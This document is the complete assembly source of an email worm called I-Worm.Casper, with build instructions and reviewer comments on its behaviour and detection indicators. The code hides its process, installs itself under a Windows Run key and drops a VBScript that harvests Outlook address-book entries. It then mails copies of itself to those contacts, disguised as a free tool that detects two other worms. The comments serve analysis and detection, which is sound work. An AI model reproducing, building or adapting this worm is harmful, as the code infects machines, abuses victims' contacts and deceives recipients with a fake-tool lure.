MalwareSourceCode/Win32/InternetWorm/I-Worm.Casper.asm

;--- dllz.def
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
;---
comment #
Name : I-Worm.Casper
Author : PetiK
Date : August 17th - August 24th
Size : 6144 bytes (compressed with UPX tool)
Action : Copy itself to
* WINDOWS\MsWinsock32.exe
Adds to the key HKLM\Software\Microsoft\Windows\CurrentVersion\Run the value
* Winsock32 1.0 = WINDOWS\MsWinsock32.exe
To build the worm:
tasm32 /ml /m9 Casper
tlink32 -Tpe -c -x -aa Casper,,,import32,dllz
upx -9 Casper.exe
To delete the worm:
del %windir%\MsWinsock32.exe
del %windir%\CasperEMail.txt
dllz.def file:
IMPORTS
WININET.InternetGetConnectedState
SHLWAPI.SHSetValueA
#
; Assembler/target: Borland TASM syntax (see the build line above), 32-bit flat
; model, Win32 API called through stdcall imports. The ';' notes below were added
; by a reviewer for reverse-engineering and detection purposes; no code changed.
.586p
.model flat
.code
JUMPS                           ; TASM: widen out-of-range conditional jumps automatically
; callx A: declare A as an external procedure, then call it. Every Win32 API used
; in this file goes through this macro, so the set of callx targets is the
; sample's import list (dllz.def above only adds the two non-import32 entries).
callx macro a
extrn a:proc
call a
endm
include useful.inc              ; presumably supplies @pushsz (not shown here) - confirm
;-----------------------------------------------------------------------
; DEBUT / Main_Worm - program entry point ('end DEBUT' at the bottom).
; Order of operations: hide process -> install copy + Run key -> inspect
; WSOCK32.DLL -> drop and run the address-harvesting VBS -> wait for
; connectivity -> mailing loop.
; No ret: control leaves only via ExitProcess inside Scan_Mail, or falls
; through into Hide_Worm's body if Spread_Worm returns.
;-----------------------------------------------------------------------
DEBUT:
Main_Worm:
call Hide_Worm
call Copy_Worm
call Check_Wsock
call Prepare_Spread_Worm
; Busy-wait (no Sleep) until InternetGetConnectedState(&Tmp, 0) returns exactly 1.
Connected_:
push 00h
push offset Tmp
callx InternetGetConnectedState
dec eax                         ; eax == 1 -> fall out of the loop
jnz Connected_
; casper_mail = GetWindowsDirectoryA() + "\CasperEMail.txt" + NUL.
; The dword immediates are byte-reversed: "saC\" stores "\Cas", "Erep" "perE", etc.
; The first push edi is not consumed by the two-argument call and is never
; popped here (Copy_Worm uses the same pattern but pops it).
mov edi,offset casper_mail
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax                     ; edi -> end of the directory string
mov eax,"saC\"
stosd
mov eax,"Erep"
stosd
mov eax,"liaM"
stosd
mov eax,"txt."
stosd
xor eax,eax
stosd                           ; NUL terminator
call Spread_Worm
;-----------------------------------------------------------------------
; Hide_Worm - resolves Kernel32!RegisterServiceProcess at run time and calls
; RegisterServiceProcess(0, 1) (RSP_SIMPLE_SERVICE); on Windows 9x this
; removes the process from the task list. If GetModuleHandleA or
; GetProcAddress returns 0 (export absent, e.g. NT-family Windows) the
; jecxz skips the call. Preserves all registers (pushad/popad).
; Detection note: the dynamic lookup of "RegisterServiceProcess" by name is
; itself a common indicator in Win9x-era samples.
;-----------------------------------------------------------------------
Hide_Worm proc
pushad
@pushsz "Kernel32.dll"
callx GetModuleHandleA
xchg eax,ecx                    ; ecx = hKernel32
jecxz End_Hide
@pushsz "RegisterServiceProcess"
push ecx
callx GetProcAddress            ; GetProcAddress(hKernel32, "RegisterServiceProcess")
xchg eax,ecx                    ; ecx = function pointer, or 0
jecxz End_Hide
push 1                          ; dwType = RSP_SIMPLE_SERVICE
push 0                          ; dwProcessId = 0 (current process)
call ecx
End_Hide:
popad
ret
Hide_Worm endp
;-----------------------------------------------------------------------
; Check_Wsock - opens <system dir>\Wsock32.dll read/write, maps it and
; inspects DOS-header bytes for two marks the author attributes to
; I-Worm.Happy and I-Worm.Icecubes; on a match shows a MessageBox and sets
; verif (verif is written here but never read in this file).
; The view is mapped writable, but nothing in the visible code stores
; through esi, so the DLL is not modified.
; Clobbers eax, esi, edi (no pushad in this proc).
;-----------------------------------------------------------------------
Check_Wsock proc
Search_Wsock:
; wsock_file = GetSystemDirectoryA() + "\Wsock32.dll" + NUL
; ("osW\" stores "\Wso", "23kc" "ck32", "lld." ".dll").
push 50
mov edi,offset wsock_file
push edi
callx GetSystemDirectoryA
add edi,eax
mov eax,"osW\"
stosd
mov eax,"23kc"
stosd
mov eax,"lld."
stosd
xor eax,eax
stosd
push offset wsock_file
callx GetFileAttributesA
cmp eax,20h                     ; proceed only if attributes are exactly FILE_ATTRIBUTE_ARCHIVE
jne End_Wsock                   ; (a missing file, -1, also bails out here)
; CreateFileA(wsock_file, GENERIC_READ|GENERIC_WRITE, share=0, 0, OPEN_EXISTING, 0, 0)
; The handle is stored without an INVALID_HANDLE_VALUE check.
xor eax,eax
push eax
push eax
push 03h
push eax
push eax
push 80000000h or 40000000h
push offset wsock_file
callx CreateFileA
mov wsckhdl,eax
File_Mapping:
; CreateFileMappingA(wsckhdl, 0, PAGE_READWRITE, 0, 0, 0)
xor eax,eax
push eax
push eax
push eax
push 04h
push eax
push wsckhdl
callx CreateFileMappingA
test eax,eax
jz Close_File
mov wsckmap,eax
; MapViewOfFile(wsckmap, FILE_MAP_READ|FILE_MAP_WRITE, 0, 0, 0)
xor eax,eax
push eax
push eax
push eax
push 06h
push wsckmap
callx MapViewOfFile
test eax,eax
jz Close_Map_File
mov esi,eax                     ; esi -> mapped image base
mov wsckview,eax
Old_Infect:
; Signature checks on the DOS header: 'MZ' at +0, then byte +12h == 'z'
; (Happy) or word +38h == 'll' (Icecubes).
mov verif,0
cmp word ptr [esi],"ZM"
jne UnmapView_File
cmp byte ptr [esi+12h],"z"
je Infected_By_Happy
cmp word ptr [esi+38h],"ll"
je Infected_By_Icecubes
jmp UnmapView_File
Infected_By_Happy:
; MessageBoxA(0, "I-Worm.Happy coded by Spanska", warning, MB_ICONHAND)
push 10h
push offset warning
@pushsz "I-Worm.Happy coded by Spanska"
push 00h
callx MessageBoxA
inc verif
; NOTE(review): the jmp target below is the imported API symbol UnmapViewOfFile
; (declared extrn by the callx at UnmapView_File), not the UnmapView_File
; label; on this path the view and handles are not released by this proc.
jmp UnmapViewOfFile
Infected_By_Icecubes:
; MessageBoxA(0, "I-Worm.Icecubes coded by f0re", warning, MB_ICONHAND)
push 10h
push offset warning
@pushsz "I-Worm.Icecubes coded by f0re"
push 00h
callx MessageBoxA
inc verif
jmp UnmapViewOfFile             ; same target as noted above
Already_Infected:               ; unreferenced in the visible code
inc verif
jmp UnmapViewOfFile             ; same target as noted above
UnmapView_File:
push wsckview
callx UnmapViewOfFile
Close_Map_File:
push offset wsckmap             ; passes the address of wsckmap, not the mapping handle
callx CloseHandle
Close_File:
push wsckhdl
callx CloseHandle
End_Wsock:
ret
Check_Wsock endp
;-----------------------------------------------------------------------
; Copy_Worm - installation and persistence.
;   original  = GetModuleFileNameA(0)          path of the running image
;   copy_name = GetWindowsDirectoryA() + "\MsWinsock32.exe"
;   CopyFileA(original, copy_name, FALSE)
;   HKLM\Software\Microsoft\Windows\CurrentVersion\Run  Winsock32 = copy_name
;   HKCU\Software\CasperWorm  Author, Version            infection markers
; All SHSetValueA calls pass dwType = REG_SZ (1) and cbData = 8 bytes.
; Preserves all registers (pushad/popad).
; Detection note: the Run value name "Winsock32", the HKCU\Software\CasperWorm
; key and the file name MsWinsock32.exe are the durable indicators.
;-----------------------------------------------------------------------
Copy_Worm proc
pushad
Original_Name:
; GetModuleFileNameA(0, original, 50); esi = original
push 50
mov esi,offset original
push esi
push 0
callx GetModuleFileNameA
Copy_Name:
; The extra push edi is popped after the call so edi = copy_name again.
mov edi,offset copy_name
push edi
push 50
push edi
callx GetWindowsDirectoryA
add edi,eax
; 'WsM\' stores "\MsW", 'osni' "inso", '23kc' "ck32", 'exe.' ".exe".
; No NUL is appended here; relies on copy_name being zero-initialised (50 dup (0)).
mov eax,'WsM\'
stosd
mov eax,'osni'
stosd
mov eax,'23kc'
stosd
mov eax,'exe.'
stosd
pop edi
; CopyFileA(original, copy_name, bFailIfExists = 0)
push 0
push edi
push esi
callx CopyFileA
Reg_Registered:
; SHSetValueA(hKey, pszSubKey, pszValue, dwType, pvData, cbData)
; hKey 80000002h = HKEY_LOCAL_MACHINE; pvData = copy_name; cbData = 8
push 08h
push edi
push 01h
@pushsz "Winsock32"
@pushsz "Software\Microsoft\Windows\CurrentVersion\Run"
push 80000002h
callx SHSetValueA
; hKey 80000001h = HKEY_CURRENT_USER; Author marker, cbData = 8
push 08h
@pushsz "PetiK - France - (c)2001"
push 01h
@pushsz "Author"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
; Version marker, cbData = 8 (the string itself is 5 bytes incl. NUL)
push 08h
@pushsz "1.00"
push 01h
@pushsz "Version"
@pushsz "Software\CasperWorm"
push 80000001h
callx SHSetValueA
popad
ret
Copy_Worm endp
;-----------------------------------------------------------------------
; Prepare_Spread_Worm - address harvesting via a dropped script.
; Writes the VBS at vbsd (VBSSIZE bytes) to C:\CasperMail.vbs, runs it with
; WinExec("wscript C:\CasperMail.vbs", SW_SHOWNORMAL), sleeps a fixed 3 s
; (no wait on the child process), then deletes the script.
; The script (see vbsd in .data) appends Outlook address-book entries to
; <Windows dir>\CasperEMail.txt and ends the list with "#".
; Preserves all registers (pushad/popad).
; Detection note: C:\CasperMail.vbs exists only briefly; the wscript command
; line and CasperEMail.txt are the observable indicators.
;-----------------------------------------------------------------------
Prepare_Spread_Worm proc
pushad
; CreateFileA("C:\CasperMail.vbs", GENERIC_WRITE, FILE_SHARE_READ, 0,
;             CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, 0)
push 00h
push 80h
push 02h
push 00h
push 01h
push 40000000h
@pushsz "C:\CasperMail.vbs"
callx CreateFileA
xchg edi,eax                    ; edi = handle (not checked against INVALID_HANDLE_VALUE)
; WriteFile(edi, vbsd, VBSSIZE, &octets, 0)
push 00h
push offset octets
push VBSSIZE
push offset vbsd
push edi
callx WriteFile
push edi
callx CloseHandle
push 1                          ; uCmdShow = SW_SHOWNORMAL
@pushsz "wscript C:\CasperMail.vbs"
callx WinExec
push 3 * 1000                   ; fixed 3000 ms delay for the script to run
callx Sleep
@pushsz "C:\CasperMail.vbs"
callx DeleteFileA
popad
ret
Prepare_Spread_Worm endp
;-----------------------------------------------------------------------
; Spread_Worm - maps <Windows dir>\CasperEMail.txt read-only and hands the
; view to Scan_Mail.
; Registers: ebx = file handle, ebp = mapping handle, esi = view base.
; F3/F2/F1 release resources in reverse order of acquisition.
; Returns only if the file cannot be opened or mapped, or is <= 3 bytes;
; otherwise Scan_Mail never returns (ExitProcess).
;-----------------------------------------------------------------------
Spread_Worm:
pushad
; CreateFileA(casper_mail, GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING,
;             FILE_ATTRIBUTE_NORMAL, 0)
push 00h
push 80h
push 03h
push 00h
push 01h
push 80000000h
push offset casper_mail
callx CreateFileA
inc eax                         ; inc/test/dec: detect INVALID_HANDLE_VALUE (-1)
test eax,eax
je End_Spread_worm
dec eax
xchg eax,ebx                    ; ebx = file handle
; CreateFileMappingA(ebx, 0, PAGE_READONLY, 0, 0, 0)
xor eax,eax
push eax
push eax
push eax
push 02h
push eax
push ebx
callx CreateFileMappingA
test eax,eax
je F1
xchg eax,ebp                    ; ebp = mapping handle
; MapViewOfFile(ebp, FILE_MAP_READ, 0, 0, 0)
xor eax,eax
push eax
push eax
push eax
push 04h
push ebp
callx MapViewOfFile
test eax,eax
je F2
xchg eax,esi                    ; esi = view base, consumed by Scan_Mail
push 00h
push ebx
callx GetFileSize               ; GetFileSize(ebx, 0)
cmp eax,03h
jbe F3                          ; nothing to scan if the file is <= 3 bytes (unsigned)
call Scan_Mail
F3: push esi
callx UnmapViewOfFile
F2: push ebp
callx CloseHandle
F1: push ebx
callx CloseHandle
End_Spread_worm:
popad
ret
;-----------------------------------------------------------------------
; Scan_Mail - line parser over the mapped CasperEMail.txt.
; In:  esi -> current byte of the view (set by Spread_Worm).
; Each line is copied into m_addr (edi) with spaces dropped; on CR (0dh)
; a message is sent to that address if the line held at least one stored
; byte other than '@' (edx counts those). LF (0ah) rewinds the buffer.
; '#' (the terminator the VBS writes last) ends the run via ExitProcess(0).
; The only exit is ExitProcess: every line re-enters at pushad through jmp,
; so 32 bytes of stack accumulate per line.
; Bounds: no length check against m_addr (128 bytes) and no check against
; the file size - the scan relies entirely on the '#' terminator.
;-----------------------------------------------------------------------
Scan_Mail:
pushad
xor edx,edx                     ; edx = stored bytes other than '@' on this line
mov edi,offset m_addr
push edi                        ; saved buffer start, popped at entr1/entr2
p_c: lodsb
cmp al," "
je car_s
cmp al,0dh
je entr1
cmp al,0ah
je entr2
cmp al,"#"
je f_mail
cmp al,"@"
je not_a                        ; '@' is stored but not counted
inc edx
not_a: stosb
jmp p_c
car_s: inc esi                  ; lodsb consumed the space; this skips the next byte too
jmp p_c
entr1: xor al,al                ; CR: NUL-terminate and rewind edi
stosb
pop edi
test edx,edx
je Scan_Mail                    ; empty line - restart (re-executes pushad)
call Send_Mail
jmp Scan_Mail
entr2: xor al,al                ; LF: NUL-terminate, rewind, restart
stosb
pop edi
jmp Scan_Mail
f_mail:
FIN: push 00h
callx ExitProcess               ; ExitProcess(0) - process ends here
;-----------------------------------------------------------------------
; Send_Mail - calls MAPISendMail with session handle MAPIHdl (0 in .data,
; never written in the visible code), followed by offset Message and three
; zero dwords in the order pushed below.
; Message (see .data) carries subject "Casper Tool Protect 1.00", the body
; text, recipient m_addr and the running image (original) attached under the
; name Casper_Tool.exe.
; Clobbers eax. MAPISendMail is not in the dllz.def import list at the top;
; where it is resolved from is not visible here.
;-----------------------------------------------------------------------
Send_Mail:
xor eax,eax
push eax
push eax
push eax
push offset Message
push [MAPIHdl]
callx MAPISendMail
ret
.data
; Globals, grouped by the routine that uses them. Strings below are the
; sample's static indicators (file names, subject, attachment name).
; ===== Main_Worm =====
wsock_file db 50 dup (0)        ; actually filled/used by Check_Wsock: <system dir>\Wsock32.dll
; ===== Check_Wsock =====
wsckhdl dd 0                    ; CreateFileA handle
wsckmap dd 0                    ; CreateFileMappingA handle
wsckview dd 0                   ; MapViewOfFile base
PEHeader dd 0                   ; unreferenced in the visible code
warning db "Warning : You're infected by",00h   ; MessageBox caption
verif dd ?                      ; set in Check_Wsock, never read in this file
; ===== Copy_Worm =====
original db 50 dup (0)          ; path of the running image (also the mail attachment path)
copy_name db 50 dup (0)         ; <Windows dir>\MsWinsock32.exe
; ===== Prepare_Spread_Worm =====
octets dd ?                     ; bytes written by WriteFile
; ===== Spread_Worm =====
m_addr db 128 dup (?)           ; current recipient address (no bound check in Scan_Mail)
casper_mail db 50 dup (0)       ; <Windows dir>\CasperEMail.txt
mail_name db "Casper_Tool.exe",00h              ; attachment display name
MAPIHdl dd 0                    ; MAPI session handle passed to MAPISendMail; stays 0
Tmp dd 0                        ; receives InternetGetConnectedState flags
subject db "Casper Tool Protect 1.00",00h
body db "Hi,",0dh,0ah
db "Look at this attachment...",0dh,0ah
db "This freeware alert you if you infected by "
db "I-Worm.Happy and I-Worm.Icecubes.",0dh,0ah
db "These worms spread with the file WSOCK32.DLL in the SYSTEM path.",0dh,0ah
db "The tool Casper v.1.00 scans this specific file and displays a message "
db "if it infected.",0dh,0ah,0dh,0ah,0dh,0ah
db 09h,09h,09h,"Good Bye and have a nice day",00h
; MapiMessage structure (12 dwords), passed to MAPISendMail by Send_Mail.
Message dd ?                    ; ulReserved
dd offset subject               ; lpszSubject
dd offset body                  ; lpszNoteText
dd ?                            ; lpszMessageType
dd ?                            ; lpszDateReceived
dd ?                            ; lpszConversationID
dd 2                            ; flFlags
dd offset MsgFrom               ; lpOriginator
dd 1                            ; nRecipCount
dd offset MsgTo                 ; lpRecips
dd 1                            ; nFileCount
dd offset Attach                ; lpFiles
; MapiRecipDesc for the originator - all fields left unset.
MsgFrom dd ?
dd ?
dd ?
dd ?
dd ?
dd ?
; MapiRecipDesc for the recipient: class 1 (MAPI_TO), name and address both
; point at m_addr, which Scan_Mail overwrites per line.
MsgTo dd ?                      ; ulReserved
dd 1                            ; ulRecipClass
dd offset m_addr                ; lpszName
dd offset m_addr                ; lpszAddress
dd ?                            ; ulEIDSize
dd ?                            ; lpEntryID
; MapiFileDesc: attaches the running image (original) under the name mail_name.
Attach dd ?                     ; ulReserved
dd ?                            ; flFlags
dd ?                            ; nPosition
dd offset original              ; lpszPathName
dd offset mail_name             ; lpszFileName
dd ?                            ; lpFileType
; VBScript dropped by Prepare_Spread_Worm as C:\CasperMail.vbs and run with
; wscript. It enumerates every Outlook address list via the MAPI namespace and
; appends each entry's address, one per line, to <Windows folder>\CasperEMail.txt
; (GetSpecialFolder(0) = WindowsFolder; OpenTextFile mode 8 = append), then
; writes a final "#" line that Scan_Mail uses as its end marker.
; Detection note: Outlook.Application automation from wscript plus writes to
; CasperEMail.txt are the behavioural indicators of this stage.
vbsd:
db 'On Error Resume Next',0dh,0ah
db 'Set Casper = CreateObject("Outlook.Application")',0dh,0ah
db 'Set L = Casper.GetNameSpace("MAPI")',0dh,0ah
db 'Set fs=CreateObject("Scripting.FileSystemObject")',0dh,0ah
db 'Set c=fs.CreateTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt")',0dh,0ah   ; truncate/create
db 'c.Close',0dh,0ah
db 'For Each M In L.AddressLists',0dh,0ah
db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah
db 'For O = 1 To M.AddressEntries.Count',0dh,0ah
db 'Set P = M.AddressEntries(O)',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah   ; reopen for append per entry
db 'c.WriteLine P.Address',0dh,0ah
db 'c.Close',0dh,0ah
db 'Next',0dh,0ah
db 'End If',0dh,0ah
db 'Next',0dh,0ah
db 'Set c=fs.OpenTextFile(fs.GetSpecialFolder(0)&"\CasperEMail.txt",8,true)',0dh,0ah
db 'c.WriteLine "#"',0dh,0ah    ; end-of-list marker checked by Scan_Mail
db 'c.Close',0dh,0ah
VBSSIZE = $-vbsd                ; byte length of the script, used by WriteFile
; FindFirstFile-style structures. Neither the struct nor the Search instance
; is referenced anywhere in the visible code (likely left over from another
; routine or template).
MAX_PATH equ 260
FILETIME struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes dd ?
ftCreationTime FILETIME ?
ftLastAccessTime FILETIME ?
ftLastWriteTime FILETIME ?
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName dd MAX_PATH (?)       ; declared as MAX_PATH dwords, not bytes
cAlternateFileName db 13 dup (?)
db 3 dup (?)
WIN32_FIND_DATA ends
Search WIN32_FIND_DATA <>       ; unreferenced in the visible code
end DEBUT
end